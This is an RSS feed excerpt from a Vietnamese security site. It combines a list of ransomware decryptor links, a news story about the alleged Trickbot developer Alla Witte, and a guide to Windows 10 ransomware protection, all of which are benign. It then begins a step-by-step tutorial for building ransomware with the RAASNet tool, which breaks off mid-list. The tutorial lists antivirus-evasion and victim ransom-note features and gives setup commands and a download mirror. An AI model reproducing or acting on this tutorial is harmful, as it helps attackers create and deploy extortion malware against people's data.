<li><strong><a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">TeslaCrypt V2 ransom decryption tool</a> + <a href="https://github.com/Cisco-Talos/TeslaDecrypt" target="_blank" rel="noopener">alternative</a></strong></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">TeslaCrypt V3 ransom decryption tool</a> + <a href="https://www.mcafee.com/us/downloads/free-tools/tesladecrypt.aspx" target="_blank" rel="noopener">alternative 1</a> + <a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">alternative 2</a> + <a href="https://github.com/Cisco-Talos/TeslaDecrypt" target="_blank" rel="noopener">alternative 3</a></strong></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">TeslaCrypt V4 ransom decryption tool</a> + <a href="https://www.mcafee.com/us/downloads/free-tools/tesladecrypt.aspx" target="_blank" rel="noopener">alternative 1</a> + <a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">alternative 2</a> + <a href="https://github.com/Cisco-Talos/TeslaDecrypt" target="_blank" rel="noopener">alternative 3</a></strong></li>
<li><a href="https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" target="_blank" rel="noopener"><strong>Thanatos decryption tool</strong></a></li>
<li><a href="https://mdsassets.blob.core.windows.net/downloads/ThunderX-Decryptor.exe" target="_blank" rel="noopener"><strong>ThunderX decryptor</strong></a></li>
<li><a href="https://download.eset.com/com/eset/tools/decryptors/trustezeb_a/latest/esettrustezebadecoder.exe" target="_blank" rel="noopener"><strong>Trustezeb.A decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/turkstatik" target="_blank" rel="noopener"><strong>TurkStatic decryptor</strong></a></li>
<li><a href="http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" target="_blank" rel="noopener"><strong>TorrentLocker decrypting tool</strong></a></li>
<li><a href="http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware" target="_blank" rel="noopener"><strong>Umbrecrypt decrypting tool</strong></a></li>
<li><a href="https://www.elevenpaths.com/downloads/vcrypt_decryptor.zip" target="_blank" rel="noopener"><strong>VCRYPTOR decryptor</strong></a></li>
<li><a href="https://github.com/gentilkiwi/wanakiwi/releases" target="_blank" rel="noopener"><strong>WannaCry ransomware decryption tool</strong></a>+ <a href="https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" target="_blank" rel="noopener"><strong>Guide</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/wannacryfake" target="_blank" rel="noopener">WannaCryFake Ransom decryption tool</a></strong></li>
<li><a href="https://labs.bitdefender.com/2020/08/wannaren-decryption-tool/" target="_blank" rel="noopener"><strong>WannaRen decryption tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/RU/WildfireDecryptor.zip" target="_blank" rel="noopener"><strong>Wildfire decrypting tool + </strong></a><a href="http://www.mcafee.com/us/downloads/free-tools/wildfiredecrypt.aspx" target="_blank" rel="noopener"><strong>alternative 1</strong></a> + <strong><a href="https://www.mcafee.com/us/downloads/free-tools/wildfiredecrypt.aspx" target="_blank" rel="noopener">alternative 2</a></strong></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>XData Ransom decryption tool</strong></a> (decrypted by Rakhni Decryptor)</li>
<li><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>XORBAT decrypting tool</strong></a></li>
<li><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>XORIST decrypting tool</strong></a>+ <a href="https://decrypter.emsisoft.com/xorist" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Yatron decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://www.emsisoft.com/decrypter/zerofucks" target="_blank" rel="noopener"><strong>ZeroFucks decryptor</strong></a></li>
<li><strong><a href="https://files.avast.com/files/decryptor/avast_decryptor_cryptomix.exe" target="_blank" rel="noopener">Zeta decrypting tool</a> </strong>(decrypted by the CryptoMix Decryptor)</li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/ziggy" target="_blank" rel="noopener"><strong>Ziggy ransomware decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/zorab" target="_blank" rel="noopener"><strong>Zorab ransomware decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/decrypter/download/zq" target="_blank" rel="noopener"><strong>ZQ ransomware decryptor</strong></a></li>
</ol>
<h2>Câu hỏi thường gặp</h2>
<h3>Tôi có thể làm gì nếu máy tính của tôi bị nhiễm ransomware?</h3>
<p>Đừng trả tiền chuộc!  Hãy thử tìm bản sao lưu dữ liệu. Nếu không có bản sao lưu, hãy sử dụng các công cụ giải mã ransomware được liệt kê trong bài viết này.  Chọn công cụ phù hợp với loại ransomware đã tấn công hệ thống của bạn (xác định qua phần mở rộng tệp bị mã hóa).</p>
<h3>Làm thế nào để tôi tìm ra loại ransomware nào đã tấn công máy tính của tôi?</h3>
<p>Quan sát phần mở rộng tệp bị mã hóa.  Phần mở rộng tệp thường cho biết loại ransomware đang hoạt động.  Bài viết này liệt kê nhiều loại ransomware khác nhau và các công cụ giải mã tương ứng.</p>
<h3>Có đảm bảo rằng các công cụ giải mã này sẽ hoạt động không?</h3>
<p>Không có gì đảm bảo tuyệt đối.  Hiệu quả của các công cụ phụ thuộc vào phiên bản ransomware và phương thức mã hóa cụ thể. Tuy nhiên, các công cụ này được phát triển bởi các chuyên gia bảo mật và có tỷ lệ thành công nhất định.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/tong-hop-hon-200-tool-giai-ma-ransomware/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Người phụ nữ 55 tuổi là bà trùm Hacker nhóm Trickbot</title>
		<link>https://anonyviet.com/nguoi-phu-nu-55-tuoi-la-ba-trum-hacker-nhom-trickbot/</link>
					<comments>https://anonyviet.com/nguoi-phu-nu-55-tuoi-la-ba-trum-hacker-nhom-trickbot/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 09 Oct 2021 09:48:10 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[nữ hacker]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[trickbot]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=34831</guid>

					<description><![CDATA[Vào ngày 4/6/2021, một công dân Latvia đã bị Mỹ tuyên bố với nhiều tội danh xuất cáo buộc của cô trong một tổ chức tội phạm mạng xuyên quốc gia chịu trách nhiệm tạo và phát tán trojan đánh cắp thông tin ngân hàng và ransomware được gọi là “Trickbot”. Người phụ nữ 55 [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Vào ngày 4/6/2021, một công dân Latvia đã bị Mỹ tuyên bố với nhiều tội danh xuất cáo buộc của cô trong một tổ chức tội phạm mạng xuyên quốc gia chịu trách nhiệm tạo và phát tán trojan đánh cắp thông tin ngân hàng và ransomware được gọi là “Trickbot”.</strong></p>
<h2>Người phụ nữ 55 tuổi là bà trùm Hacker nhóm Trickbot</h2>
<p>Alla Witte, hay còn gọi là Max, 55 tuổi, bị buộc 19 tội danh trong bản cáo trạng 47 tội danh, cáo buộc cô tham gia vào một tổ chức tội phạm được gọi là “Nhóm Trickbot”. Nhóm Trickbot hoạt động ở Nga, Belarus, Ukraine và Suriname, và chủ yếu nhắm mục tiêu vào các máy tính nạn nhân thuộc các doanh nghiệp, tổ chức và cá nhân, gồm cả những máy tính ở bang Ohio và các nơi khác ở Hoa Kỳ. Các mục tiêu bao gồm bệnh viện, trường học, tiện ích công cộng và chính phủ. Witte, người trước đây cư trú tại Paramaribo, Suriname, đã bị bắt vào ngày 6 tháng 2, tại Miami, Florida.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/10/thu-linh-hacker-trickbot.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2021/10/thu-linh-hacker-trickbot.jpg" alt="thu linh hacker trickbot" width="600" height="400" title="Người phụ nữ 55 tuổi là bà trùm Hacker nhóm Trickbot 30"></a></p>
<p>“Witte và các cộng sự của cô ấy bị cáo buộc đã lây nhiễm cho hàng chục triệu máy tính trên toàn thế giới nhằm đánh cắp hàng triệu đô la thông qua các hệ thống máy tính bị xâm nhập&#8221;</p>
<p>Bản cáo trạng cáo buộc rằng bắt đầu từ tháng 11 năm 2015, Witte và những người khác đã đánh cắp tiền và thông tin bí mật từ những nạn nhân, gồm các doanh nghiệp và tổ chức tài chính của họ ở Hoa Kỳ, Vương quốc Anh, Úc, Bỉ, Canada, Đức, Ấn Độ, Ý, Mexico, Tây Ban Nha. và Nga thông qua việc sử dụng phần mềm độc hại Trickbot.</p>
<p>Witte và đồng phạm của cô bị cáo buộc đã làm việc cùng nhau để lây nhiễm phần mềm độc hại Trickbot vào máy tính nạn nhân được thiết kế để lấy thông tin đăng nhập ngân hàng trực tuyến và thu thập thông tin cá nhân khác, bao gồm số thẻ tín dụng, email, mật khẩu, ngày sinh, số an sinh xã hội và địa chỉ. Witte và những người khác cũng bị cáo buộc đã chiếm được thông tin đăng nhập và thông tin cá nhân bị đánh cắp khác để truy cập vào tài khoản ngân hàng trực tuyến, thực hiện chuyển tiền điện tử trái phép và rửa tiền thông qua các tài khoản thụ hưởng ở Hoa Kỳ và nước ngoài.</p>
<p>Theo cáo trạng, Witte làm việc với tư cách là lập trình viên tạo nên phần mềm độc hại cho Trickbot Group và viết mã liên quan đến việc kiểm soát, triển khai và nhận tiền chuộc do ransomware mã hóa. Phần mềm tống tiền đã thông báo cho nạn nhân rằng máy tính của họ đã được mã hóa và họ cần mua phần mềm đặc biệt thông qua địa chỉ Bitcoin do Nhóm Trickbot kiểm soát để giải mã các tệp của họ. Ngoài ra, Witte bị cáo buộc đã cung cấp mã cho Nhóm Trickbot theo dõi và theo dõi những người dùng được ủy quyền của phần mềm độc hại, đồng thời phát triển các công cụ và giao thức để lưu trữ thông tin đăng nhập bị đánh cắp.</p>
<p>Trickbot là tên của một nhóm tội phạm mạng sở hữu mạng botnet cực lớn gồm các thiết bị kết nối internet bị tấn công được sử dụng để thực hiện các cuộc tấn công mạng. Theo công ty nghiên cứu mạng Malwarebytes Inc. , nhóm tội phạm mạng quản lý mạng botnet và bán phần mềm độc hại cho các Hacker khác.</p>
<p>Sau khi bị lây nhiễm, máy tính nạn nhân trở thành một phần của mạng botnet, một mạng lưới gồm hàng nghìn máy tính và máy chủ trên khắp thế giới dính phần mềm độc hại Trickbot. Phần mềm độc hại này được sử dụng như một điểm xâm nhập cho các tin tặc &#8220;săn tìm dữ liệu&#8221; để hoạt động gián điệp hoặc tìm cách để phát tán ransomware.</p>
<p>Kể từ khi Trickbot  được phát hiện lần đầu tiên vào năm 2016, chủ nhân của Trickbot đã đánh cắp hàng chục đến hàng trăm triệu đô la từ các nạn nhân ở Mỹ, bao gồm các ngân hàng, trường đại học và chính quyền địa phương, theo các chuyên gia an ninh mạng và tài liệu của tòa án. Vào tháng 10, khi các ca nhiễm coronavirus gia tăng ở Mỹ, các nhà chức trách đã cảnh báo về “mối đe dọa tội phạm mạng gia tăng và sắp xảy ra đối với các bệnh viện và nhà cung cấp dịch vụ chăm sóc sức khỏe của Hoa Kỳ” từ Trickbot và các nhóm hack khác.</p>
<p>Trong tuần đầu tiên làm việc cho nhóm Trickbot vào năm 2018, Witte đã viết một đoạn mã để theo dõi từng người trong số hàng trăm người dùng bị nhiễm mã độc của Trickbot. Trong vòng vài tháng, cô ấy đã xuất bản một video hướng dẫn cho các đối tác Trickbot của mình cách sử dụng phần mềm theo dõi. Vào thời điểm cô ấy đã làm việc với nhóm được một năm, cô ấy đã viết mã cho bảng điều khiển web mà Trickbot sử dụng để lưu trữ cơ sở dữ liệu lưu trữ các thông tin của nạn nhân, bao gồm cả hệ thống mã hóa màu để đồng bọn có thể theo dõi tiến trình của của các máy bị hack.</p>
<p>Witte sẽ tiếp tục viết mã kiểm soát việc triển khai ransomware, bao gồm cả ghi chú mà nạn nhân nhận được thông báo rằng hệ thống máy tính của họ đã được mã hóa.</p>
<p>Witte đã thông tin chi tiết về lý lịch của mình trên các tài khoản mạng xã hội, được phát hiện và dịch bởi Holden. Cô lớn lên dọc theo Biển Đen ở thành phố Rostov-on-Don của Nga, theo các tài khoản mạng xã hội của cô. Sau khi học tại Đại học Latvia , Witte làm quản lý bán hàng và giáo viên vào những năm 1980. Theo các bài báo, mối quan tâm của cô đối với công nghệ nổi lên vào cuối những năm 90 và đầu những năm 2000.</p>
<p>Sau khi kết hôn năm 2007, gia đình cô chuyển từ Hà Lan đến Suriname, Nam Mỹ. Đó là khoảng thời gian này, năm 2013, cô ấy bắt đầu học lập trình Web. Chỉ trong 6 năm học lập trình, cô đã trở thành Hacker khét tiếng và thủ lĩnh nhóm Trickbot vào năm 2018.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/nguoi-phu-nu-55-tuoi-la-ba-trum-hacker-nhom-trickbot/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bật tính năng chống Virus mã hóa Ransomware trên Windows 10</title>
		<link>https://anonyviet.com/bat-tinh-nang-chong-virus-ma-hoa-ransomware/</link>
					<comments>https://anonyviet.com/bat-tinh-nang-chong-virus-ma-hoa-ransomware/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 18 May 2021 06:55:22 +0000</pubDate>
				<category><![CDATA[Windows 7/8/10/11]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[bảo vệ dữ liệu]]></category>
		<category><![CDATA[mã hóa dữ liệu]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[windows security]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=27038</guid>

					<description><![CDATA[Nhiều năm qua trên thế giới đã chứng kiến cảnh Ransomware mã hóa dữ liệu đòi tiền chuộc như WannaCry và Petya nhắm mục tiêu vào nhiều máy tính Windows. Đó là lý do tại sao Windows 10 hiện được tích hợp công cụ chống Virus mã hóa Ransomware vào Windows Defender. Trong bài viết [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Nhiều năm qua trên thế giới đã chứng kiến cảnh Ransomware mã hóa dữ liệu đòi tiền chuộc như WannaCry và Petya nhắm mục tiêu vào nhiều máy tính Windows. Đó là lý do tại sao Windows 10 hiện được tích hợp công cụ chống Virus mã hóa Ransomware vào Windows Defender. Trong bài viết này, AnonyViet sẽ hướng dẫn bạn cách bật tính năng phòng tránh Ransomware lây nhiễm trên Windows 10 mà không cài thêm phần mềm khác.</strong></p>
<h2>Tính năng chống Virus mã hóa Ransomware trên Windows 10 là gì?</h2>
<p>Khi bị Virus mã hóa ransomware tấn công vào máy tính, dữ liệu của bạn sẽ bị mã hóa và phải trả tiền chuộc để nhận khóa giải mã. Người dùng sẽ phải trả tiền trong trường hợp dữ liệu quan trọng bị mã hóa. Trong một số trường hợp, không có gì đảm bảo liệu tin tặc có giải mã dữ liệu cho bạn  sau khi nhận được tiền chuộc hay không, họ có thể yêu cầu nhiều hơn.</p>
<p>Các cuộc tấn công ransomware thậm chí đã dẫn đến việc phá hủy dữ liệu khiến không thể khôi phục lại được. Vì vậy cần có biện pháp bảo vệ dữ liệu điện tử của bạn trên máy tính. Microsoft đã cố gắng giải quyết vấn đề này bằng cách ngăn các ứng dụng độc hại thực hiện các thay đổi trái phép đối với một số thư mục quan trọng trên Windows.</p>
<p>Microsoft đã tổng hợp một danh sách các ứng dụng đáng tin cậy, có thể được sử dụng để xác minh xem ứng dụng được cài đặt trên máy của bạn có phải là ransomware hay không. Tính năng này tuy không diệt được ransomware nhưng ít nhất nó cũng bổ sung thêm một lớp bảo mật cho Windows</p>
<h2>Làm cách nào để bật tính năng Chống Ransomware trên Windows 10?</h2>
<p>Tính năng bảo vệ khỏi Ransomware được Microsoft đặt tên là <strong>Ransomware Protectio</strong>n. Để bật tính năng Ransomware Protection trên Windows 10, bạn không cần phải cài đặt bất kỳ ứng dụng bên thứ ba vì nó được tích hợp sẵn trong Windows. Bạn có thể làm điều đó bằng cách sử dụng ứng dụng diệt Virus <strong>Windows Security</strong> được tích hợp sẵn theo hướng dẫn các bước sau:</p>
<p>1. Nhấn nút Start gõ chữ <strong>Windows Security để</strong> mở ứng dụng.</p>
<p>2. Nhấp vào tùy chọn <strong>Virus &amp; threat protection</strong> trong bảng điều khiển bên trái.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/05/Virus-threat-protection.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/05/Virus-threat-protection.jpg" alt="Bật tính năng chống Virus mã hóa Ransomware trên Windows 10" width="679" height="486" title="Bật tính năng chống Virus mã hóa Ransomware trên Windows 10 35"></a></p>
<p>3. Bây giờ, bạn sẽ thấy bảo vệ ransomware ở dưới cùng, nhấp vào <strong>Manage ransomware protection.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/05/Manage-ransomware-protection.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2021/05/Manage-ransomware-protection.jpg" alt="Manage ransomware protection" width="532" height="472" title="Bật tính năng chống Virus mã hóa Ransomware trên Windows 10 36"></a></p>
<p>4. Tại đây, bật nút <strong>Controlled folder access</strong> từ Off thành ON.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/05/Controlled-folder-access.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2021/05/Controlled-folder-access.jpg" alt="Controlled folder access" width="568" height="375" title="Bật tính năng chống Virus mã hóa Ransomware trên Windows 10 37"></a></p>
<p>Đó là tất cả những gì bạn cần làm. Theo mặc định, tính năng bảo vệ ransomware của Windows 10 chỉ hoạt động đối với một số thư mục hệ thống như Downloads, Pictures, Documents, v.v. Bạn có thể thêm thư mục cần bảo vệ bằng cách có thể nhấp vào <strong><em>Protected Folders</em></strong> để thêm đường dẫn các thư mục sẽ không bị hóa nếu bị ransomware tấn công. Bạn có thể cho phép ứng dụng cụ thể truy cập quyền vào thư mục được bảo vệ bằng cách click vào <strong><em>Allow an app through Controlled folder access</em></strong><em>, </em>sau đó chọn ứng dụng cần cho phép.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/05/Protected-Folders.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2021/05/Protected-Folders.jpg" alt="Protected Folders" width="469" height="511" title="Bật tính năng chống Virus mã hóa Ransomware trên Windows 10 38"></a></p>
<p>Các máy tính hoặc Server sử dụng Windows Server 2019 có thể sử dụng tính năng bảo vệ chống Ransomware của phần mềm <strong>Microsoft Endpoint Configuration Manager</strong> và <strong>InTune</strong>.</p>
<h2>Làm thế nào để khôi phục dữ liệu khi bị Ransomware mã hóa?</h2>
<p>Một điều quan trọng khác hiện nay để tránh bị virus mã hóa dữ liệu là thường xuyên sao lưu dữ liệu. Trước đây bạn thường lưu ra USB hoặc ổ cứng gắn ngoài, nhưng nay đã có dịch vụ lưu trữ đám mây</p>
<p>OneDrive của Microsoft có thể được sử dụng để sao lưu dữ liệu từ Windows 10, có thể giúp khôi phục các dữ liệu của bạn sau một cuộc tấn công mã hóa. Do đó, bạn nên tiếp tục bật tính năng <strong>đồng bộ hóa OneDrive</strong> của mình. Hoặc bạn có thể sử dụng các dịch vụ đám mây khác như Google Drive hoặc Dropbox.</p>
<p>Bạn cũng có thể sử dụng <a href="https://anonyviet.com/cach-su-dung-cac-cong-cu-sao-luu-va-khoi-phuc-tren-windows-10/" target="_blank" rel="noopener">tính năng File History</a> trên Windows 10 để sao lưu dữ liệu vào ổ cứng ngoài hoặc SSD. Sao khi sao lưu xong, bạn nhớ ngắt kết nối ổ cứng gắn ngoài ra khỏi máy tính.</p>
<p>Đây là cách để bảo vệ an toàn dữ liệu trước các cuộc tấn công của Ransomware, nếu máy tính của bạn đã lỡ dính virus mã hóa dữ liệu, hãy thử giải mã bằng cách công như <a href="https://anonyviet.com/download-360-ransomware-decryption-tool/" target="_blank" rel="noopener">Ransomware Decryption Tool</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tính năng chống Ransomware trên Windows 10 hoạt động như thế nào?</h3>
<p>Tính năng này, gọi là Controlled folder access, bảo vệ các thư mục quan trọng khỏi những thay đổi trái phép từ các ứng dụng không được tin cậy, ngăn chặn ransomware mã hóa dữ liệu của bạn.  Nó không diệt virus nhưng thêm một lớp bảo mật.</p>
<h3>Tôi có cần cài đặt phần mềm bên thứ ba để bật tính năng này không?</h3>
<p>Không cần! Tính năng chống Ransomware đã được tích hợp sẵn trong Windows Security (Windows Defender) của Windows 10. Bạn chỉ cần bật nó lên thông qua các bước hướng dẫn trong bài viết.</p>
<h3>Nếu bị Ransomware tấn công, làm sao để khôi phục dữ liệu?</h3>
<p>Cách tốt nhất là sao lưu dữ liệu thường xuyên lên đám mây (OneDrive, Google Drive, Dropbox&#8230;) hoặc ổ cứng ngoài bằng tính năng File History.  Nếu đã bị tấn công, hãy thử sử dụng các công cụ giải mã ransomware, nhưng việc khôi phục từ bản sao lưu là phương pháp hiệu quả nhất.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/bat-tinh-nang-chong-virus-ma-hoa-ransomware/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet</title>
		<link>https://anonyviet.com/huong-dan-tao-ransomware-bang-raasnet/</link>
					<comments>https://anonyviet.com/huong-dan-tao-ransomware-bang-raasnet/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 19 Dec 2020 07:00:01 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[virus tống tiền]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=23862</guid>

					<description><![CDATA[Ransomware là một dạng virus khi bị lây nhiễm vào máy tính sẽ mã hóa tất cả dữ liệu của nạn nhân, sau đó sẽ hiện thông báo đòi tiền chuộc. AnonyViet tìm được một tool có tên là RAASNet, giúp tạo ra Ransomware bằng python và có cả giao diện để thiết lập, quản [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Ransomware là một dạng virus khi bị lây nhiễm vào máy tính sẽ mã hóa tất cả dữ liệu của nạn nhân, sau đó sẽ hiện thông báo đòi tiền chuộc. AnonyViet tìm được một tool có tên là RAASNet, giúp tạo ra Ransomware bằng python và có cả giao diện để thiết lập, quản lý. Trong bài này chúng ta sẽ tìm hiểu cách tạo Ransomware, cũng như giải mã các file đã bị mã hóa.</strong></p>
<p><span style="color: #0000ff;"><em>RAASNet và bài viết này chỉ dành cho nghiên cứu. Không được sử dụng trong thế giới ngoài đời thật. Tôi không chịu trách nhiệm về bất kỳ thiệt hại nào bạn có thể gây ra với kiến ​​thức của bài viết này.</em></span></p>
<p style="text-align: center;"><strong><span style="color: #ff0000;">Để an toàn cho dữ liệu, bạn nên thực nghiệm bài này trên VMWare (Kali linux, Windows).</span></strong></p>
<h2>RAASNet có tác dụng gì?</h2>
<p>RAASNet là một công cụ bằng python giúp bạn tạo ra Ransomeware theo ý muốn, bạn có thể chọn các mã hóa file, nội dung thông báo đến nạn nhân và key giải mã. Đặc điểm:</p>
<ul>
<li>Tạo ransomware</li>
<li>Tùy chỉnh giao diện cho ransomeware</li>
<li>FUD (bypass antivirus)</li>
<li>Hoạt động trên Windows, MacOS và Linux</li>
<li>Mã hóa siêu nhanh với PyCrypto</li>
<li>Có thể biên dịch sang EXE, APP hoặc Unix/Linux</li>
<li>Tùy chỉnh icon cho exe</li>
<li>Tạo key mã hóa/giải mã</li>
<li>Chế độ demo (ransomeware sẽ không mã hóa bất kỳ thứ gì)</li>
<li>Chế độ toàn màn hình (Cảnh báo chiếm toàn màn hình)</li>
<li>Thông báo cảnh báo tùy chỉnh cho nạn nhân của bạn</li>
<li>Chế độ ma (Ghostmod) (Đổi tên bằng cách thêm phần mở rộng .DEMON thay vì mã hóa các tệp)</li>
<li>Nhiều phương pháp mã hóa</li>
<li>Tùy chọn nhiều loại file để mã hóa</li>
<li>Quyết định xem ransomeware có nên tự hủy (chỉ tính năng ở chế độ Bảng điều khiển)</li>
<li>Quyết định ổ đĩa nào để nhắm mục tiêu để mã hóa (thư mục làm việc)</li>
<li>Quyền truy cập máy chủ đã xác minh thông qua VPN chuyển tiếp cổng</li>
</ul>
<h2>Cách sử dụng RAASNet tạo Ransomeware</h2>
<h3>Tạo Server Linux</h3>
<p>Trên Kali linux, tiến hành tải bộ Source RAASNET về bằng cách thực hiện các lệnh dưới đây</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">git clone https://github.com/leonv024/RAASNet.git
cd RAASNet
pip3 install -r requirements.txt
python3 RAASNet.py
</pre>
<p style="text-align: center;">Hoặc tải link dự phòng tại: <span style="text-decoration: underline;"><strong><a href="http://www.fshare.vn/file/DO2W5R2QC49Q" target="_blank" rel="noopener">Download RAASNET</a></strong></span><strong>  </strong><span style="text-decoration: underline;"><strong>(</strong></span><strong>Password: anonyviet.com)</strong></p>
<p>Sau khi hoàn tất các bước, bạn sẽ thấy giao diện đăng nhập của RAASNET, click vào <strong>Register</strong> để tạo tài khoản quản lý và tiến hành đăng nhập nhé.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/create-ransomware-RAASNET-1.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/create-ransomware-RAASNET-1.jpg" alt="Cách sử dụng RAASNet tạo Ransomeware" width="399" height="366" title="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 43"></a></p>
<p style="text-align: left;">Bây giờ bạn sẽ thấy giao diện <strong>RAASNET Generator</strong>, với 4 chức năng gồm:<a href="https://anonyviet.com/wp-content/uploads/2020/12/RAASNet-generator-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/12/RAASNet-generator-1.jpg" alt="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 24" width="362" height="374" title="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 44"></a></p>
<ul>
<li><span style="color: #0000ff;">START SERVER:</span></li>
<li><span style="color: #0000ff;">DECRYPT FILES:</span> tạo file giải mã file cho nạn nhân</li>
<li><span style="color: #0000ff;">GENERATE PAYLOADS:</span> tạo Ransomware</li>
<li><span style="color: #0000ff;">COMPILE PAYLOAD:</span> biên dịch Ransomware sang exe.</li>
<li><span style="color: #0000ff;">PROFILE:</span> thông tin tài khoản</li>
